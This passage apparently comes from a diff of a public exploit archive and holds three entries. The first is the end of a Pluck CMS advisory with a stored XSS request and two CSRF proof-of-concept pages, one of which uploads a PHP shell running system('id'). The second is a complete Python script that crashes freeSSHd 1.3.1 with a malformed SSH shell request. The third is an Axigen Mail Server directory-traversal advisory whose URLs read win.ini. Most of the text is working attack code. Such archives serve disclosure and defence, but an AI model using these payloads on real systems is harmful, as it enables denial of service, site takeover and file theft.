Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
title=hello12&seo_name=&content=<script>alert(1337)</script>&description=&keywords=&hidden=no&sub_page=&theme=default&save=Save
#1 - Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 21:11:43 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7337
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
#2 - Request:
GET /pluck/?file=hello12 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/?file=hello
Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
Connection: keep-alive
#2 - Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 21:11:51 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1289
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
(...)
<div class="submenu">
</div>
<div class="kop">hello12</div>
<div class="txt">
<script>alert(1337)</script> </div>
<div style="clear: both;"> </div>
<div class="footer">
(...)
4/ CSRF
Since there is no protection at all, it is able to trigger many actions via cross site request forgery.
<html>
<!-- Change site settings -->
<body>
<form action="http://localhost/pluck/admin.php?action=settings" method="POST">
<input type="hidden" name="cont1" value="pwn" />
<input type="hidden" name="cont2" value="usr&#64;mail&#46;box" />
<input type="hidden" name="save" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<html>
<!-- File upload -->
<body>
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/pluck/admin.php?action=files", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------155797884312716218971623852778");
xhr.withCredentials = true;
var body = "-----------------------------155797884312716218971623852778\r\n" +
"Content-Disposition: form-data; name=\"filefile\"; filename=\"phpinfo.php5\"\r\n" +
"Content-Type: application/x-php\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"system(\'id\');\r\n" +
"?\x3e\r\n" +
"\r\n" +
"-----------------------------155797884312716218971623852778\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Upload\r\n" +
"-----------------------------155797884312716218971623852778--";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
</body>
</html>

515
platforms/windows/dos/38001.py Executable file
View file

@ -0,0 +1,515 @@
'''
# Exploit title: freesshd 1.3.1 denial of service vulnerability
# Date: 28-8-2015
# Vendor homepage: http://www.freesshd.com
# Software Link: http://www.freesshd.com/freeSSHd.exe
# Version: 1.3.1
# Author: 3unnym00n
# Details:
# ----------------------------------------------
# byte SSH_MSG_CHANNEL_REQUEST
# uint32 recipient channel
# string "shell"
# boolean want reply
# freeSSHd doesn't correctly handle channel shell request, when the "shell" length malformed can lead crashing
# Tested On: win7, xp
# operating steps:
1. in the freeSSHd settings: add a user, named "root", password is "fuckinA"
2. restart the server to let the configuration take effect
3. modify the hostname in this py.
4. running the py, u will see the server crash
# remark: u can also modify the user auth service request packet, to adjust different user, different password
'''
import socket
import struct
import os
from StringIO import StringIO
from hashlib import sha1
from Crypto.Cipher import Blowfish, AES, DES3, ARC4
from Crypto.Util import Counter
from hmac import HMAC
## suppose server accept our first dh kex: diffie-hellman-group14-sha1
P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF
G = 2
__sequence_number_out = 3
zero_byte = chr(0)
one_byte = chr(1)
four_byte = chr(4)
max_byte = chr(0xff)
cr_byte = chr(13)
linefeed_byte = chr(10)
crlf = cr_byte + linefeed_byte
class Message (object):
"""
An SSH2 message is a stream of bytes that encodes some combination of
strings, integers, bools, and infinite-precision integers (known in Python
as longs). This class builds or breaks down such a byte stream.
Normally you don't need to deal with anything this low-level, but it's
exposed for people implementing custom extensions, or features that
paramiko doesn't support yet.
"""
big_int = long(0xff000000)
def __init__(self, content=None):
"""
Create a new SSH2 message.
:param str content:
the byte stream to use as the message content (passed in only when
decomposing a message).
"""
if content is not None:
self.packet = StringIO(content)
else:
self.packet = StringIO()
def __str__(self):
"""
Return the byte stream content of this message, as a string/bytes obj.
"""
return self.asbytes()
def __repr__(self):
"""
Returns a string representation of this object, for debugging.
"""
return 'paramiko.Message(' + repr(self.packet.getvalue()) + ')'
def asbytes(self):
"""
Return the byte stream content of this Message, as bytes.
"""
return self.packet.getvalue()
def add_bytes(self, b):
"""
Write bytes to the stream, without any formatting.
:param str b: bytes to add
"""
self.packet.write(b)
return self
def add_byte(self, b):
"""
Write a single byte to the stream, without any formatting.
:param str b: byte to add
"""
self.packet.write(b)
return self
def add_boolean(self, b):
"""
Add a boolean value to the stream.
:param bool b: boolean value to add
"""
if b:
self.packet.write(one_byte)
else:
self.packet.write(zero_byte)
return self
def add_size(self, n):
"""
Add an integer to the stream.
:param int n: integer to add
"""
self.packet.write(struct.pack('>I', n))
return self
def add_int(self, n):
"""
Add an integer to the stream.
:param int n: integer to add
"""
if n >= Message.big_int:
self.packet.write(max_byte)
self.add_string(deflate_long(n))
else:
self.packet.write(struct.pack('>I', n))
return self
def add_int(self, n):
"""
Add an integer to the stream.
@param n: integer to add
@type n: int
"""
if n >= Message.big_int:
self.packet.write(max_byte)
self.add_string(deflate_long(n))
else:
self.packet.write(struct.pack('>I', n))
return self
def add_int64(self, n):
"""
Add a 64-bit int to the stream.
:param long n: long int to add
"""
self.packet.write(struct.pack('>Q', n))
return self
def add_mpint(self, z):
"""
Add a long int to the stream, encoded as an infinite-precision
integer. This method only works on positive numbers.
:param long z: long int to add
"""
self.add_string(deflate_long(z))
return self
def add_string(self, s):
"""
Add a string to the stream.
:param str s: string to add
"""
self.add_size(len(s))
self.packet.write(s)
return self
def add_list(self, l):
"""
Add a list of strings to the stream. They are encoded identically to
a single string of values separated by commas. (Yes, really, that's
how SSH2 does it.)
:param list l: list of strings to add
"""
self.add_string(','.join(l))
return self
def _add(self, i):
if type(i) is bool:
return self.add_boolean(i)
elif isinstance(i, int):
return self.add_int(i)
elif type(i) is list:
return self.add_list(i)
else:
return self.add_string(i)
def add(self, *seq):
"""
Add a sequence of items to the stream. The values are encoded based
on their type: str, int, bool, list, or long.
.. warning::
Longs are encoded non-deterministically. Don't use this method.
:param seq: the sequence of items
"""
for item in seq:
self._add(item)
def deflate_long(n, add_sign_padding=True):
"""turns a long-int into a normalized byte string (adapted from Crypto.Util.number)"""
# after much testing, this algorithm was deemed to be the fastest
s = bytes()
n = long(n)
while (n != 0) and (n != -1):
s = struct.pack('>I', n & long(0xffffffff)) + s
n >>= 32
# strip off leading zeros, FFs
for i in enumerate(s):
if (n == 0) and (i[1] != chr(0)):
break
if (n == -1) and (i[1] != chr(0xff)):
break
else:
# degenerate case, n was either 0 or -1
i = (0,)
if n == 0:
s = chr(0)
else:
s = chr(0xff)
s = s[i[0]:]
if add_sign_padding:
if (n == 0) and (ord(s[0]) >= 0x80):
s = chr(0) + s
if (n == -1) and (ord(s[0]) < 0x80):
s = chr(0xff) + s
return s
def inflate_long(s, always_positive=False):
"""turns a normalized byte string into a long-int (adapted from Crypto.Util.number)"""
out = long(0)
negative = 0
if not always_positive and (len(s) > 0) and (ord(s[0]) >= 0x80):
negative = 1
if len(s) % 4:
filler = chr(0)
if negative:
filler = chr(0xff)
# never convert this to ``s +=`` because this is a string, not a number
# noinspection PyAugmentAssignment
s = filler * (4 - len(s) % 4) + s
for i in range(0, len(s), 4):
out = (out << 32) + struct.unpack('>I', s[i:i+4])[0]
if negative:
out -= (long(1) << (8 * len(s)))
return out
def byte_mask(c, mask):
return chr(ord(c) & mask)
def _compute_key(K, H, session_id, id, nbytes):
"""id is 'A' - 'F' for the various keys used by ssh"""
m = Message()
m.add_mpint(K)
m.add_bytes(H)
m.add_byte(str(id))
m.add_bytes(session_id)
out = sofar = sha1(m.asbytes()).digest()
while len(out) < nbytes:
m = Message()
m.add_mpint(K)
m.add_bytes(H)
m.add_bytes(sofar)
digest = sha1(m.asbytes()).digest()
out += digest
sofar += digest
return out[:nbytes]
def compute_hmac(key, message, digest_class):
return HMAC(key, message, digest_class).digest()
def read_msg(sock, block_engine_in, block_size, mac_size):
header = sock.recv(block_size)
header = block_engine_in.decrypt(header)
packet_size = struct.unpack('>I', header[:4])[0]
leftover = header[4:]
buf = sock.recv(packet_size + mac_size - len(leftover))
packet = buf[:packet_size - len(leftover)]
post_packet = buf[packet_size - len(leftover):]
packet = block_engine_in.decrypt(packet)
packet = leftover + packet
def send_msg(sock, raw_data, block_engine_out, mac_engine_out, mac_key_out, mac_size):
global __sequence_number_out
out = block_engine_out.encrypt(raw_data)
payload = struct.pack('>I', __sequence_number_out) + raw_data
out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]
sock.send(out)
__sequence_number_out += 1
def exploit(hostname, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, port))
## send client banner
client_banner = 'SSH-2.0-SUCK\r\n'
sock.send(client_banner)
## recv server banner
server_banner = ''
while True:
data = sock.recv(1)
if data == '\x0a':
break
server_banner += data
print 'server banner is: ', server_banner.__repr__()
## do key exchange
## send client algorithms
cookie = os.urandom(16)
client_kex = '000001cc0514'.decode('hex') + cookie + '000000596469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000237373682d7273612c7373682d6473732c65636473612d736861322d6e69737470323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e65000000000000000000000000000000000000'.decode('hex')
sock.send(client_kex)
client_kex_init = client_kex[5:-5]
## recv server algorithms
server_kex = ''
str_pl = sock.recv(4)
pl = struct.unpack('>I', str_pl)[0]
tmp = sock.recv(pl)
padding_len = ord(tmp[0])
server_kex_init = tmp[1:-padding_len]
## do dh kex
## send client dh kex
x = 2718749950853797850634218108087830670950606437648125981418769990607126772940049948484122336910062802584089370382091267133574445173294378254000629897200925498341633999513190035450218329607097225733329543524028305346861620006860852918487068859161361831623421024322904154569598752827192453199975754781944810347
e = 24246061990311305114571813286712069338300342406114182522571307971719868860460945648993499340734221725910715550923992743644801884998515491806836377726946636968365751276828870539451268214005738703948104009998575652199698609897222885198283575698226413251759742449790092874540295563182579030702610986594679727200051817630511413715723789617829401744474112405554024371460263485543685109421717171156358397944976970310869333766947439381332202584288225313692797532554689171177447651177476425180162113468471927127194797168639270094144932251842745747512414228391665092351122762389774578913976053048427148163469934452204474329639
client_dh_kex = '0000010c051e0000010100c010d8c3ea108d1915c9961f86d932f3556b82cd09a7e1d24c88f7d98fc88b19ca3908cada3244dfc5534860b967019560ce5ee243007d41ecf68e9bfa7631847ecb1091558fd7ffe2f17171115690a6d10f3b62c317157ced9291770cc452cc93fb911f18de644ef988c09a3bff35770e99d1546d31c320993f8c12bb275cd2742afc547a0f3309c29a6e72611af965b6144b837ca2003c3ca1f3e35797ab143669b9034c575794c645383519d485a133e67d0793097ef08b72523fa3199c35358676d1fd9776248cae08e46da6414d0f975ffa4b4c84f69db86c47401808daa8a5919fc52ebed157b99e0dd2a4203f0c9e06d6395fa5c9b38a7ae8b159ea270000000000'.decode('hex')
sock.send(client_dh_kex)
## recv server dh kex
str_pl = sock.recv(4)
pl = struct.unpack('>I', str_pl)[0]
server_dh_kex = sock.recv(pl)
## send client newkeys
client_newkeys = '0000000c0a1500000000000000000000'.decode('hex')
sock.send(client_newkeys)
## recv server newkeys
str_pl = sock.recv(4)
pl = struct.unpack('>I', str_pl)[0]
server_new_keys = sock.recv(pl)
## calc all we need ...
host_key_len = struct.unpack('>I', server_dh_kex[2:6])[0]
# print host_key_len
host_key = server_dh_kex[6:6 + host_key_len]
f_len = struct.unpack('>I', server_dh_kex[6 + host_key_len:10 + host_key_len])[0]
str_f = server_dh_kex[10 + host_key_len:10 + host_key_len + f_len]
dh_server_f = inflate_long(str_f)
sig_len = struct.unpack('>I', server_dh_kex[10 + host_key_len + f_len:14 + host_key_len + f_len])[0]
sig = server_dh_kex[14 + host_key_len + f_len:14 + host_key_len + f_len + sig_len]
K = pow(dh_server_f, x, P)
## build up the hash H of (V_C || V_S || I_C || I_S || K_S || e || f || K), aka, session id
hm = Message()
hm.add(client_banner.rstrip(), server_banner.rstrip(),
client_kex_init, server_kex_init)
hm.add_string(host_key)
hm.add_mpint(e)
hm.add_mpint(dh_server_f)
hm.add_mpint(K)
H = sha1(hm.asbytes()).digest()
## suppose server accept our first cypher: aes128-ctr, hmac-sha1
block_size = 16
key_size = 16
mac_size = 20
IV_out = _compute_key(K, H, H, 'A', block_size)
key_out = _compute_key(K, H, H, 'C', key_size)
block_engine_out = AES.new(key_out, AES.MODE_CTR, IV_out, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_out, True)))
mac_engine_out = sha1
mac_key_out = _compute_key(K, H, H, 'E', mac_engine_out().digest_size)
IV_in = _compute_key(K, H, H, 'B', block_size)
key_in = _compute_key(K, H, H, 'D', key_size)
block_engine_in = AES.new(key_in, AES.MODE_CTR, IV_in, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_in, True)))
mac_engine_in = sha1
mac_key_in = _compute_key(K, H, H, 'F', mac_engine_in().digest_size)
## do user auth
## send client service request (user auth)
client_service_request = '\x00\x00\x00\x1C\x0A\x05\x00\x00\x00\x0C\x73\x73\x68\x2D\x75\x73\x65\x72\x61\x75\x74\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
## encrypt the packet
send_msg(sock, client_service_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
## recv server service accept
read_msg(sock, block_engine_in, block_size, mac_size)
## send client userauth request
client_userauth_request = '\x00\x00\x00\x3C\x08\x32'
## the user name length and username
client_userauth_request += '\x00\x00\x00\x04'
client_userauth_request += 'root'
## service
client_userauth_request += '\x00\x00\x00\x0E'
client_userauth_request += 'ssh-connection'
## password
client_userauth_request += '\x00\x00\x00\x08'
client_userauth_request += 'password'
client_userauth_request += '\x00'
## plaintext password fuckinA
client_userauth_request += '\x00\x00\x00\x07'
client_userauth_request += 'fuckinA'
## padding
client_userauth_request += '\x00'*8
## encrypt the packet
print 'send client_userauth_request'
send_msg(sock, client_userauth_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
# out = block_engine_out.encrypt(client_userauth_request)
# payload = struct.pack('>I', __sequence_number_out) + client_userauth_request
# out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]
# sock.send(out)
## recv server userauth success
print 'recv server userauth success'
read_msg(sock, block_engine_in, block_size, mac_size)
## begin send malformed data
## send channel open
client_channel_open = '\x00\x00\x00\x2c\x13\x5a\x00\x00\x00\x07session\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x80\x00' + '\x00'*0x13
print 'send client_channel_open'
send_msg(sock, client_channel_open, block_engine_out, mac_engine_out, mac_key_out, mac_size)
## recv channel open success
# print 'recv channel open success'
read_msg(sock, block_engine_in, block_size, mac_size)
## send client channel request
client_channel_request = '\x00\x00\x00\x3c\x0d\x62\x00\x00\x00\x00\x00\x00\x00\x07pty-req\x01\x00\x00\x00\x05vt100\x00\x00\x00\x50\x00\x00\x00\x18' \
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00'*0x0d
print 'send client_channel_request'
send_msg(sock, client_channel_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
## recv server pty success
# print 'recv server pty success'
read_msg(sock, block_engine_in, block_size, mac_size)
## send client shell request
client_shell_request = '\x00\x00\x00\x1c\x0c\x62\x00\x00\x00\x00'
client_shell_request += '\x6a\x0b\xd8\xdashell' # malformed
client_shell_request += '\x01'
client_shell_request += '\x00'*0x0c
print 'send client_shell_request'
send_msg(sock, client_shell_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
# print 'recv server shell success'
# read_msg(sock, block_engine_in, block_size, mac_size)
if __name__ == '__main__':
hostname = '192.168.242.128'
port = 22
exploit(hostname, port)

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56343/info
Axigen Mail Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied data.
A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to obtain sensitive information, cause a denial of service condition, or execute arbitrary code with the privileges of the application. This could help the attacker launch further attacks.
http://www.example.com/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini
http://www.example.com/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini